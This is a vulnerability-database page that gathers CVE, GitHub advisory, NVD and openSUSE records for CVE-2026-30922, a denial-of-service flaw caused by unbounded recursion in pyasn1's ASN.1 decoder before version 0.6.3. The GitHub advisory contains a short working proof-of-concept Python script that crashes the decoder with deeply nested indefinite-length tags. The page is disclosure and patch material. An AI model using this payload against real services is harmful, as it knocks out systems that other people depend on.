Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2026-30922 (GCVE-0-2026-30922)
Vulnerability from cvelistv5 – Published: 2026-03-18 02:29 – Updated: 2026-03-21 00:16
VLAI?
EPSS
Title
pyasn1 Vulnerable to Denial of Service via Unbounded Recursion
Summary
pyasn1 is a generic ASN.1 library for Python. Prior to 0.6.3, the `pyasn1` library is vulnerable to a Denial of Service (DoS) attack caused by uncontrolled recursion when decoding ASN.1 data with deeply nested structures. An attacker can supply a crafted payload containing thousands of nested `SEQUENCE` (`0x30`) or `SET` (`0x31`) tags with "Indefinite Length" (`0x80`) markers. This forces the decoder to recursively call itself until the Python interpreter crashes with a `RecursionError` or consumes all available memory (OOM), crashing the host application. This is a distinct vulnerability from CVE-2026-23490 (which addressed integer overflows in OID decoding). The fix for CVE-2026-23490 (`MAX_OID_ARC_CONTINUATION_OCTETS`) does not mitigate this recursion issue. Version 0.6.3 fixes this specific issue.
Severity ?
7.5 (High)
CWE
- CWE-674 - Uncontrolled Recursion
Assigner
References
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-30922",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-03-18T20:16:18.738732Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-03-18T20:17:53.102Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2026-03-21T00:16:47.028Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"url": "http://www.openwall.com/lists/oss-security/2026/03/20/4"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "pyasn1",
"vendor": "pyasn1",
"versions": [
{
"status": "affected",
"version": "\u003c 0.6.3"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "pyasn1 is a generic ASN.1 library for Python. Prior to 0.6.3, the `pyasn1` library is vulnerable to a Denial of Service (DoS) attack caused by uncontrolled recursion when decoding ASN.1 data with deeply nested structures. An attacker can supply a crafted payload containing thousands of nested `SEQUENCE` (`0x30`) or `SET` (`0x31`) tags with \"Indefinite Length\" (`0x80`) markers. This forces the decoder to recursively call itself until the Python interpreter crashes with a `RecursionError` or consumes all available memory (OOM), crashing the host application. This is a distinct vulnerability from CVE-2026-23490 (which addressed integer overflows in OID decoding). The fix for CVE-2026-23490 (`MAX_OID_ARC_CONTINUATION_OCTETS`) does not mitigate this recursion issue. Version 0.6.3 fixes this specific issue."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-674",
"description": "CWE-674: Uncontrolled Recursion",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-03-18T02:29:45.857Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/pyasn1/pyasn1/security/advisories/GHSA-jr27-m4p2-rc6r",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/pyasn1/pyasn1/security/advisories/GHSA-jr27-m4p2-rc6r"
},
{
"name": "https://github.com/pyasn1/pyasn1/commit/25ad481c19fdb006e20485ef3fc2e5b3eff30ef0",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pyasn1/pyasn1/commit/25ad481c19fdb006e20485ef3fc2e5b3eff30ef0"
}
],
"source": {
"advisory": "GHSA-jr27-m4p2-rc6r",
"discovery": "UNKNOWN"
},
"title": "pyasn1 Vulnerable to Denial of Service via Unbounded Recursion"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-30922",
"datePublished": "2026-03-18T02:29:45.857Z",
"dateReserved": "2026-03-07T16:40:05.884Z",
"dateUpdated": "2026-03-21T00:16:47.028Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2026-30922\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-18T04:17:18.397\",\"lastModified\":\"2026-03-21T01:17:06.360\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"pyasn1 is a generic ASN.1 library for Python. Prior to 0.6.3, the `pyasn1` library is vulnerable to a Denial of Service (DoS) attack caused by uncontrolled recursion when decoding ASN.1 data with deeply nested structures. An attacker can supply a crafted payload containing thousands of nested `SEQUENCE` (`0x30`) or `SET` (`0x31`) tags with \\\"Indefinite Length\\\" (`0x80`) markers. This forces the decoder to recursively call itself until the Python interpreter crashes with a `RecursionError` or consumes all available memory (OOM), crashing the host application. This is a distinct vulnerability from CVE-2026-23490 (which addressed integer overflows in OID decoding). The fix for CVE-2026-23490 (`MAX_OID_ARC_CONTINUATION_OCTETS`) does not mitigate this recursion issue. Version 0.6.3 fixes this specific issue.\"},{\"lang\":\"es\",\"value\":\"pyasn1 es una biblioteca ASN.1 gen\u00e9rica para Python. Antes de la versi\u00f3n 0.6.3, la biblioteca \u0027pyasn1\u0027 es vulnerable a un ataque de denegaci\u00f3n de servicio (DoS) causado por recursi\u00f3n incontrolada al decodificar datos ASN.1 con estructuras profundamente anidadas. Un atacante puede suministrar una carga \u00fatil manipulada que contenga miles de etiquetas \u0027SEQUENCE\u0027 (\u00270x30\u0027) o \u0027SET\u0027 (\u00270x31\u0027) anidadas con marcadores de \u0027Longitud Indefinida\u0027 (\u00270x80\u0027). Esto fuerza al decodificador a llamarse recursivamente hasta que el int\u00e9rprete de Python falla con un \u0027RecursionError\u0027 o consume toda la memoria disponible (OOM), provocando la ca\u00edda de la aplicaci\u00f3n anfitriona. Esta es una vulnerabilidad distinta de CVE-2026-23490 (que abord\u00f3 desbordamientos de enteros en la decodificaci\u00f3n de OID). La soluci\u00f3n para CVE-2026-23490 (\u0027MAX_OID_ARC_CONTINUATION_OCTETS\u0027) no mitiga este problema de recursi\u00f3n. La versi\u00f3n 0.6.3 soluciona este problema espec\u00edfico.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-674\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:pyasn1:pyasn1:*:*:*:*:*:python:*:*\",\"versionEndExcluding\":\"0.6.3\",\"matchCriteriaId\":\"3F5F876E-E9B5-45D9-AE85-5E3E35AD09D7\"}]}]}],\"references\":[{\"url\":\"https://github.com/pyasn1/pyasn1/commit/25ad481c19fdb006e20485ef3fc2e5b3eff30ef0\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/pyasn1/pyasn1/security/advisories/GHSA-jr27-m4p2-rc6r\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"http://www.openwall.com/lists/oss-security/2026/03/20/4\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CVE Program Container\", \"references\": [{\"url\": \"http://www.openwall.com/lists/oss-security/2026/03/20/4\"}], \"providerMetadata\": {\"orgId\": \"af854a3a-2127-422b-91ae-364da2661108\", \"shortName\": \"CVE\", \"dateUpdated\": \"2026-03-21T00:16:47.028Z\"}}, {\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-30922\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-18T20:16:18.738732Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-03-18T20:17:44.631Z\"}}], \"cna\": {\"title\": \"pyasn1 Vulnerable to Denial of Service via Unbounded Recursion\", \"source\": {\"advisory\": \"GHSA-jr27-m4p2-rc6r\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"pyasn1\", \"product\": \"pyasn1\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 0.6.3\"}]}], \"references\": [{\"url\": \"https://github.com/pyasn1/pyasn1/security/advisories/GHSA-jr27-m4p2-rc6r\", \"name\": \"https://github.com/pyasn1/pyasn1/security/advisories/GHSA-jr27-m4p2-rc6r\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/pyasn1/pyasn1/commit/25ad481c19fdb006e20485ef3fc2e5b3eff30ef0\", \"name\": \"https://github.com/pyasn1/pyasn1/commit/25ad481c19fdb006e20485ef3fc2e5b3eff30ef0\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"pyasn1 is a generic ASN.1 library for Python. Prior to 0.6.3, the `pyasn1` library is vulnerable to a Denial of Service (DoS) attack caused by uncontrolled recursion when decoding ASN.1 data with deeply nested structures. An attacker can supply a crafted payload containing thousands of nested `SEQUENCE` (`0x30`) or `SET` (`0x31`) tags with \\\"Indefinite Length\\\" (`0x80`) markers. This forces the decoder to recursively call itself until the Python interpreter crashes with a `RecursionError` or consumes all available memory (OOM), crashing the host application. This is a distinct vulnerability from CVE-2026-23490 (which addressed integer overflows in OID decoding). The fix for CVE-2026-23490 (`MAX_OID_ARC_CONTINUATION_OCTETS`) does not mitigate this recursion issue. Version 0.6.3 fixes this specific issue.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-674\", \"description\": \"CWE-674: Uncontrolled Recursion\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-18T02:29:45.857Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2026-30922\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-21T00:16:47.028Z\", \"dateReserved\": \"2026-03-07T16:40:05.884Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-03-18T02:29:45.857Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
GHSA-JR27-M4P2-RC6R
Vulnerability from github – Published: 2026-03-17 16:17 – Updated: 2026-03-25 18:25
VLAI?
Summary
Denial of Service in pyasn1 via Unbounded Recursion
Details
Summary
The pyasn1 library is vulnerable to a Denial of Service (DoS) attack caused by uncontrolled recursion when decoding ASN.1 data with deeply nested structures. An attacker can supply a crafted payload containing nested SEQUENCE (0x30) or SET (0x31) tags with Indefinite Length (0x80) markers. This forces the decoder to recursively call itself until the Python interpreter crashes with a RecursionError or consumes all available memory (OOM), crashing the host application.
Details
The vulnerability exists because the decoder iterates through the input stream and recursively calls decodeFun (the decoding callback) for every nested component found, without tracking or limiting the recursion depth.
Vulnerable Code Locations:
1. indefLenValueDecoder (Line 998):
for component in decodeFun(substrate, asn1Spec, allowEoo=True, **options):
This method handles indefinite-length constructed types. It sits inside a while True loop and recursively calls the decoder for every nested tag.
-
valueDecoder(Lines 786 and 907):for component in decodeFun(substrate, componentType, **options):This method handles standard decoding when a schema is present. It contains two distinct recursive calls that lack depth checks: Line 786: Recursively decodes components ofSEQUENCEorSETtypes. Line 907: Recursively decodes elements ofSEQUENCE OForSET OFtypes. -
_decodeComponentsSchemaless(Line 661):for component in decodeFun(substrate, **options):This method handles decoding when no schema is provided.
In all three cases, decodeFun is invoked without passing a depth parameter or checking against a global MAX_ASN1_NESTING limit.
PoC
import sys
from pyasn1.codec.ber import decoder
sys.setrecursionlimit(100000)
print("[*] Generating Recursion Bomb Payload...")
depth = 50_000
chunk = b'\x30\x80'
payload = chunk * depth
print(f"[*] Payload size: {len(payload) / 1024:.2f} KB")
print("[*] Triggering Decoder...")
try:
decoder.decode(payload)
except RecursionError:
print("[!] Crashed: Recursion Limit Hit")
except MemoryError:
print("[!] Crashed: Out of Memory")
except Exception as e:
print(f"[!] Crashed: {e}")
[*] Payload size: 9.77 KB
[*] Triggering Decoder...
[!] Crashed: Recursion Limit Hit
Impact
- This is an unhandled runtime exception that typically terminates the worker process or thread handling the request. This allows a remote attacker to trivially kill service workers with a small payload (<100KB), resulting in a Denial of Service. Furthermore, in environments where recursion limits are increased, this leads to server-wide memory exhaustion.
- Service Crash: Any service using
pyasn1to parse untrusted ASN.1 data (e.g., LDAP, SNMP, Kerberos, X.509 parsers) can be crashed remotely. - Resource Exhaustion: The attack consumes RAM linearly with the nesting depth. A small payload (<200KB) can consume hundreds of megabytes of RAM or exhaust the stack.
Credits
Vulnerability discovered by Kevin Tu of TMIR at ByteDance.
Severity ?
7.5 (High)
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.6.2"
},
"package": {
"ecosystem": "PyPI",
"name": "pyasn1"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.6.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-30922"
],
"database_specific": {
"cwe_ids": [
"CWE-674"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-17T16:17:33Z",
"nvd_published_at": "2026-03-18T04:17:18Z",
"severity": "HIGH"
},
"details": "### Summary\nThe `pyasn1` library is vulnerable to a Denial of Service (DoS) attack caused by uncontrolled recursion when decoding ASN.1 data with deeply nested structures. An attacker can supply a crafted payload containing nested `SEQUENCE` (`0x30`) or `SET` (`0x31`) tags with Indefinite Length (`0x80`) markers. This forces the decoder to recursively call itself until the Python interpreter crashes with a `RecursionError` or consumes all available memory (OOM), crashing the host application.\n\n### Details\nThe vulnerability exists because the decoder iterates through the input stream and recursively calls `decodeFun` (the decoding callback) for every nested component found, without tracking or limiting the recursion depth.\nVulnerable Code Locations:\n1. `indefLenValueDecoder` (Line 998):\n```for component in decodeFun(substrate, asn1Spec, allowEoo=True, **options):```\nThis method handles indefinite-length constructed types. It sits inside a `while True` loop and recursively calls the decoder for every nested tag.\n\n2. `valueDecoder` (Lines 786 and 907):\n```for component in decodeFun(substrate, componentType, **options):```\nThis method handles standard decoding when a schema is present. It contains two distinct recursive calls that lack depth checks: Line 786: Recursively decodes components of `SEQUENCE` or `SET` types. Line 907: Recursively decodes elements of `SEQUENCE OF` or `SET OF` types.\n\n4. `_decodeComponentsSchemaless` (Line 661):\n```for component in decodeFun(substrate, **options):```\nThis method handles decoding when no schema is provided.\n\nIn all three cases, `decodeFun` is invoked without passing a `depth` parameter or checking against a global `MAX_ASN1_NESTING` limit.\n\n### PoC\n```\nimport sys\nfrom pyasn1.codec.ber import decoder\n\nsys.setrecursionlimit(100000)\n\nprint(\"[*] Generating Recursion Bomb Payload...\")\ndepth = 50_000\nchunk = b\u0027\\x30\\x80\u0027 \npayload = chunk * depth\n\nprint(f\"[*] Payload size: {len(payload) / 1024:.2f} KB\")\nprint(\"[*] Triggering Decoder...\")\n\ntry:\n decoder.decode(payload)\nexcept RecursionError:\n print(\"[!] Crashed: Recursion Limit Hit\")\nexcept MemoryError:\n print(\"[!] Crashed: Out of Memory\")\nexcept Exception as e:\n print(f\"[!] Crashed: {e}\")\n```\n\n```\n[*] Payload size: 9.77 KB\n[*] Triggering Decoder...\n[!] Crashed: Recursion Limit Hit\n```\n\n### Impact\n- This is an unhandled runtime exception that typically terminates the worker process or thread handling the request. This allows a remote attacker to trivially kill service workers with a small payload (\u003c100KB), resulting in a Denial of Service. Furthermore, in environments where recursion limits are increased, this leads to server-wide memory exhaustion.\n- Service Crash: Any service using `pyasn1` to parse untrusted ASN.1 data (e.g., LDAP, SNMP, Kerberos, X.509 parsers) can be crashed remotely.\n- Resource Exhaustion: The attack consumes RAM linearly with the nesting depth. A small payload (\u003c200KB) can consume hundreds of megabytes of RAM or exhaust the stack.\n\n### Credits\nVulnerability discovered by Kevin Tu of TMIR at ByteDance.",
"id": "GHSA-jr27-m4p2-rc6r",
"modified": "2026-03-25T18:25:07Z",
"published": "2026-03-17T16:17:33Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/pyasn1/pyasn1/security/advisories/GHSA-jr27-m4p2-rc6r"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30922"
},
{
"type": "WEB",
"url": "https://github.com/pyasn1/pyasn1/commit/25ad481c19fdb006e20485ef3fc2e5b3eff30ef0"
},
{
"type": "WEB",
"url": "https://github.com/pyasn1/pyasn1/commit/5a49bd1fe93b5b866a1210f6bf0a3924f21572c8"
},
{
"type": "PACKAGE",
"url": "https://github.com/pyasn1/pyasn1"
},
{
"type": "WEB",
"url": "https://github.com/pyasn1/pyasn1/releases/tag/v0.6.3"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2026/03/20/4"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Denial of Service in pyasn1 via Unbounded Recursion"
}
FKIE_CVE-2026-30922
Vulnerability from fkie_nvd - Published: 2026-03-18 04:17 - Updated: 2026-03-21 01:17
Severity ?
Summary
pyasn1 is a generic ASN.1 library for Python. Prior to 0.6.3, the `pyasn1` library is vulnerable to a Denial of Service (DoS) attack caused by uncontrolled recursion when decoding ASN.1 data with deeply nested structures. An attacker can supply a crafted payload containing thousands of nested `SEQUENCE` (`0x30`) or `SET` (`0x31`) tags with "Indefinite Length" (`0x80`) markers. This forces the decoder to recursively call itself until the Python interpreter crashes with a `RecursionError` or consumes all available memory (OOM), crashing the host application. This is a distinct vulnerability from CVE-2026-23490 (which addressed integer overflows in OID decoding). The fix for CVE-2026-23490 (`MAX_OID_ARC_CONTINUATION_OCTETS`) does not mitigate this recursion issue. Version 0.6.3 fixes this specific issue.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:pyasn1:pyasn1:*:*:*:*:*:python:*:*",
"matchCriteriaId": "3F5F876E-E9B5-45D9-AE85-5E3E35AD09D7",
"versionEndExcluding": "0.6.3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "pyasn1 is a generic ASN.1 library for Python. Prior to 0.6.3, the `pyasn1` library is vulnerable to a Denial of Service (DoS) attack caused by uncontrolled recursion when decoding ASN.1 data with deeply nested structures. An attacker can supply a crafted payload containing thousands of nested `SEQUENCE` (`0x30`) or `SET` (`0x31`) tags with \"Indefinite Length\" (`0x80`) markers. This forces the decoder to recursively call itself until the Python interpreter crashes with a `RecursionError` or consumes all available memory (OOM), crashing the host application. This is a distinct vulnerability from CVE-2026-23490 (which addressed integer overflows in OID decoding). The fix for CVE-2026-23490 (`MAX_OID_ARC_CONTINUATION_OCTETS`) does not mitigate this recursion issue. Version 0.6.3 fixes this specific issue."
},
{
"lang": "es",
"value": "pyasn1 es una biblioteca ASN.1 gen\u00e9rica para Python. Antes de la versi\u00f3n 0.6.3, la biblioteca \u0027pyasn1\u0027 es vulnerable a un ataque de denegaci\u00f3n de servicio (DoS) causado por recursi\u00f3n incontrolada al decodificar datos ASN.1 con estructuras profundamente anidadas. Un atacante puede suministrar una carga \u00fatil manipulada que contenga miles de etiquetas \u0027SEQUENCE\u0027 (\u00270x30\u0027) o \u0027SET\u0027 (\u00270x31\u0027) anidadas con marcadores de \u0027Longitud Indefinida\u0027 (\u00270x80\u0027). Esto fuerza al decodificador a llamarse recursivamente hasta que el int\u00e9rprete de Python falla con un \u0027RecursionError\u0027 o consume toda la memoria disponible (OOM), provocando la ca\u00edda de la aplicaci\u00f3n anfitriona. Esta es una vulnerabilidad distinta de CVE-2026-23490 (que abord\u00f3 desbordamientos de enteros en la decodificaci\u00f3n de OID). La soluci\u00f3n para CVE-2026-23490 (\u0027MAX_OID_ARC_CONTINUATION_OCTETS\u0027) no mitiga este problema de recursi\u00f3n. La versi\u00f3n 0.6.3 soluciona este problema espec\u00edfico."
}
],
"id": "CVE-2026-30922",
"lastModified": "2026-03-21T01:17:06.360",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2026-03-18T04:17:18.397",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/pyasn1/pyasn1/commit/25ad481c19fdb006e20485ef3fc2e5b3eff30ef0"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/pyasn1/pyasn1/security/advisories/GHSA-jr27-m4p2-rc6r"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.openwall.com/lists/oss-security/2026/03/20/4"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-674"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
OPENSUSE-SU-2026:10393-1
Vulnerability from csaf_opensuse - Published: 2026-03-19 00:00 - Updated: 2026-03-19 00:00Summary
python311-pyasn1-0.6.3-1.1 on GA media
Severity
Moderate
Notes
Title of the patch: python311-pyasn1-0.6.3-1.1 on GA media
Description of the patch: These are all security issues fixed in the python311-pyasn1-0.6.3-1.1 package on the GA media of openSUSE Tumbleweed.
Patchnames: openSUSE-Tumbleweed-2026-10393
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
7.5 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
References
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "python311-pyasn1-0.6.3-1.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the python311-pyasn1-0.6.3-1.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2026-10393",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2026_10393-1.json"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-30922 page",
"url": "https://www.suse.com/security/cve/CVE-2026-30922/"
}
],
"title": "python311-pyasn1-0.6.3-1.1 on GA media",
"tracking": {
"current_release_date": "2026-03-19T00:00:00Z",
"generator": {
"date": "2026-03-19T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2026:10393-1",
"initial_release_date": "2026-03-19T00:00:00Z",
"revision_history": [
{
"date": "2026-03-19T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "python311-pyasn1-0.6.3-1.1.aarch64",
"product": {
"name": "python311-pyasn1-0.6.3-1.1.aarch64",
"product_id": "python311-pyasn1-0.6.3-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "python313-pyasn1-0.6.3-1.1.aarch64",
"product": {
"name": "python313-pyasn1-0.6.3-1.1.aarch64",
"product_id": "python313-pyasn1-0.6.3-1.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "python311-pyasn1-0.6.3-1.1.ppc64le",
"product": {
"name": "python311-pyasn1-0.6.3-1.1.ppc64le",
"product_id": "python311-pyasn1-0.6.3-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python313-pyasn1-0.6.3-1.1.ppc64le",
"product": {
"name": "python313-pyasn1-0.6.3-1.1.ppc64le",
"product_id": "python313-pyasn1-0.6.3-1.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "python311-pyasn1-0.6.3-1.1.s390x",
"product": {
"name": "python311-pyasn1-0.6.3-1.1.s390x",
"product_id": "python311-pyasn1-0.6.3-1.1.s390x"
}
},
{
"category": "product_version",
"name": "python313-pyasn1-0.6.3-1.1.s390x",
"product": {
"name": "python313-pyasn1-0.6.3-1.1.s390x",
"product_id": "python313-pyasn1-0.6.3-1.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "python311-pyasn1-0.6.3-1.1.x86_64",
"product": {
"name": "python311-pyasn1-0.6.3-1.1.x86_64",
"product_id": "python311-pyasn1-0.6.3-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "python313-pyasn1-0.6.3-1.1.x86_64",
"product": {
"name": "python313-pyasn1-0.6.3-1.1.x86_64",
"product_id": "python313-pyasn1-0.6.3-1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-pyasn1-0.6.3-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-pyasn1-0.6.3-1.1.aarch64"
},
"product_reference": "python311-pyasn1-0.6.3-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-pyasn1-0.6.3-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-pyasn1-0.6.3-1.1.ppc64le"
},
"product_reference": "python311-pyasn1-0.6.3-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-pyasn1-0.6.3-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-pyasn1-0.6.3-1.1.s390x"
},
"product_reference": "python311-pyasn1-0.6.3-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
